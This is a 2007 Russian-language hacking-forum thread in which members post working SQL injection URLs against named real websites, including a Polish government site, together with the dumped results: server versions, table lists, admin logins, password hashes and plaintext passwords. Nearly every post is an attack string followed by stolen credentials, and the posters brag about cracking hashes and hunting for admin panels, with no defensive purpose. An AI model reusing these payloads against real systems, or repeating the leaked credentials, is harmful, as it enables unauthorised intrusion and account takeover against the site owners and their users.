HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.12.2007, 00:40
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
С нами: 10240623

Репутация: 79
По умолчанию

БД 4...перебором нашёл мемберов
Код HTML:
http://www.gilbo.ru/index.php?page=liderlist&art=-1255'+UNION+SELECT+1,2,concat(nick,0x3a,pass),4,5,6,7+FROM+members+limit+1,1/*
Админка
Код HTML:
http://www.gilbo.ru/admin.php
 
Ответить с цитированием

  #2  
Старый 06.12.2007, 00:49
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

EEстонский JaZZ
www.jazzkaar.ee
Код:
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+--+
4.1.13-Debian_0.dotdeb.0-log
Код:
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+limit+0,1+--+
Есч0 и сбрутил =)
Код:
testuser:179ad45c6ce2cb97cf1029e212046e81:testpass  
kasutaja:878e9103c2f839fab4027a12b1b33e8c:kasutaja
Идем дальше..

ПОЗОР ДНЯ

Корпорация ЮНИ

Специализация: Информационные технологии и Информационная Безопасность.


www.uni.ru
Код:
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12+--+
5.0.26-standard-log
Табла users.
Столбцы:
uid
user
password
Код:
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,uid,user,password),11,12+from+itg.users+--+
Код:
2:itg:zQ34hPx9
Дальше..

ONLINE JOBS
www.onlinejobs.ru
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,version(),3,4,5+--+
5.0.22
Удобный вывод всех таблиц.
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+--+
Интересные:
admins
adminip
users
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,concat_ws(0x3a,id,name,pass,mail,admins),3,4,5+from+jobsmarket_job.admins+--+
Код:
1:adminyu:1q2wasdfre:donguan@bk.ru:0
 
Ответить с цитированием

  #3  
Старый 06.12.2007, 13:57
je0n
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
С нами: 10522103

Репутация: 272
По умолчанию

Цитата:
Сообщение от ZAMUT  
EEстонский JaZZ
www.jazzkaar.ee
Код:
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+--+
4.1.13-Debian_0.dotdeb.0-log
Код:
http://www.jazzkaar.ee/eng/news.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+users+limit+0,1+--+
Есч0 и сбрутил =)
Код:
testuser:179ad45c6ce2cb97cf1029e212046e81:testpass  
kasutaja:878e9103c2f839fab4027a12b1b33e8c:kasutaja
Идем дальше..

ПОЗОР ДНЯ

Корпорация ЮНИ

Специализация: Информационные технологии и Информационная Безопасность.


www.uni.ru
Код:
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12+--+
5.0.26-standard-log
Табла users.
Столбцы:
uid
user
password
Код:
http://www.uni.ru/news.php?action=show_event&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,uid,user,password),11,12+from+itg.users+--+
Код:
2:itg:zQ34hPx9
Дальше..

ONLINE JOBS
www.onlinejobs.ru
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,version(),3,4,5+--+
5.0.22
Удобный вывод всех таблиц.
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+--+
Интересные:
admins
adminip
users
Код:
http://onlinejobs.ru/comment.php?ID=-1+union+select+1,concat_ws(0x3a,id,name,pass,mail,admins),3,4,5+from+jobsmarket_job.admins+--+
Код:
1:adminyu:1q2wasdfre:donguan@bk.ru:0
http://onlinejobs.ru:2222/CMD_LOGIN - админка, но пароль не подошел
 
Ответить с цитированием

  #4  
Старый 06.12.2007, 03:12
A2GIL
Познающий
Регистрация: 31.08.2007
Сообщений: 94
С нами: 9839462

Репутация: 200
По умолчанию

Рейтинг серверов Linage II

http://top.l2info.net/index.php?go=in&id=279 and 1=2 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21 from information_schema.tables/*
 
Ответить с цитированием

  #5  
Старый 06.12.2007, 16:34
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами: 10088966

Репутация: 646


По умолчанию

Код:
http://www.cyberbrest.com/index.php?page=files&id=-1+union+select+1,2,3,4,5,concat_ws(char(0x20,0x3a,0x20),login,password,email),7+from+user/*
 
Ответить с цитированием

  #6  
Старый 06.12.2007, 18:35
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами: 10054253

Репутация: 86
По умолчанию

www.abruzzoverdeblu.it
Код:
http://www.abruzzoverdeblu.it/?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,database(),0x3a,user(),0x3a,version(),0x3a),7,concat(username,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+abruzzov_db.utenti/*
Расскрутил до конца!!!
admin : bluver02
а админку не нашёл =)))
abruzzov_user1@localhost
5.0.45-community
abruzzov_db
 
Ответить с цитированием

  #7  
Старый 06.12.2007, 19:43
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
С нами: 10065986

Репутация: 785
По умолчанию

Код HTML:
http://www.phuket-estate.com/search.php?hot=999999'
Код HTML:
http://www.phuket-estate.com/search.php?hot=999999'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,convert(concat(USER(),char(58),VERSION())+using+latin1),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,convert(concat(DATABASE(),char(58))+using+latin1),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69/*
70 столбцов...
USER:jeab690_10@216.92.127.221
DATABASE:jeab690_AMRE
VERSION:4.1.14-log
 
Ответить с цитированием

  #8  
Старый 06.12.2007, 20:49
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами: 9949072

Репутация: 237
По умолчанию

Код:
http://www.dizelist.ru/index.php?id=-7+union+select+1,version(),concat_ws(0x2F,id,name,password),4,5,6,7+from+ds_dizelist_users/*
Version : 5.0.45-log/u59144@10.10.10.202/u59144

Admins:

Id / Name / Password

1/Dizelist.RU/Administrator123
2/Тарас/tarikpassword
3/VE/9505111
4/dizel/9112014
5/Nicolay/456123
6/Юрий/30055691
 
Ответить с цитированием

  #9  
Старый 07.12.2007, 09:57
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами: 10194175

Репутация: 524
По умолчанию

Эх, Италия ...

pigot4.it
Код:
http://www.pigot4.it/testi-canzoni-gratis/cantanti.php?cantante=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/*
4.1.19-community-nt:testicanzoniit154:WA_012988@localhost

Админ [ логин : пасс ]:
Код:
Pigot4 : LmrscA90t
------------------------------------------------------------------------

Powered by: Cowgar Racing's Apache Portal. It's CRAP!!! - gameрские сайты

Примеры:

[1.] fierojoe.com :
Код:
http://www.fierojoe.com/index.php?func=plugins&p=classifieds&go=item_details&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,version(),database(%20%20%20),user())/*
5.0.42-log:fierojoe_new:fierojoe@localhost

116 таблиц:
Код:
http://www.fierojoe.com/index.php?func=plugins&p=classifieds&go=item_details&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,table_name+from+information_schema.tables+limit+115,1/*
Наши табы и нужные акки в них:
Код:
crap_email_list
crap_host_users       fierojoe : fe565f575eebcc06e65b5cc51667c368 [ fierogt ]
crap_users            admin : 87ee82c2af7fbd7ecf7bcd7b73b4afb1
j_users               fierojoe : fierogt
[2.] ricewarsthegame.com
Код:
http://www.ricewarsthegame.com/index.php?func=plugins&p=links&go=sub_list&cat_id=-1+union+select+1,concat_ws(0x3a,version(),database(%20%20%20),user())/*
5.0.42-log:ricewars:ricewars@localhost

63 таблицы:
Код:
http://www.ricewarsthegame.com/index.php?func=plugins&p=links&go=sub_list&cat_id=-1+union+select+1,table_name+from+information_schema.tables+limit+63,1/*
Нам нужна таба mantis_user_table

Сайт группы: _http://crap.cowgarracing.com/index.php
Админский акк вероятно:
Код:
admin : 87ee82c2af7fbd7ecf7bcd7b73b4afb1
------------------------------------------------------------------------

gov

radom.rdlp.gov.pl
Код:
http://www.radom.rdlp.gov.pl/index.php?id=10&a=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*
5.0.32-Debian_7etch1-log:rdlp_radom_pl:rdlpradom@localhost

Админ [ логин : пасс ] :
Код:
paneLBiP : panelbIp,
но админку не нашёл
 
Ответить с цитированием

  #10  
Старый 07.12.2007, 11:40
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
С нами: 10143707

Репутация: 114
По умолчанию

Код:
http://www.alliancepermanentaccess.eu/index.php?id=-1+union+select+1,id,username,password,5,6,7+from+users+limit+3,2/*
database: alliancepermanentaccess

user: alliancepa@kb.edu

version: 5.0.22-community-nt

в базе всего 4 пользователя:

1)login:Hans Jansen
password:jansen

2)login:Ingrid Dillo
password:dillo

3)login:Bert Bulder
password:bulder

4)login:KirstenvH (может добавлять и редактировать новости)
password:hulsen

Последний раз редактировалось [aywo]; 07.12.2007 в 11:44..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.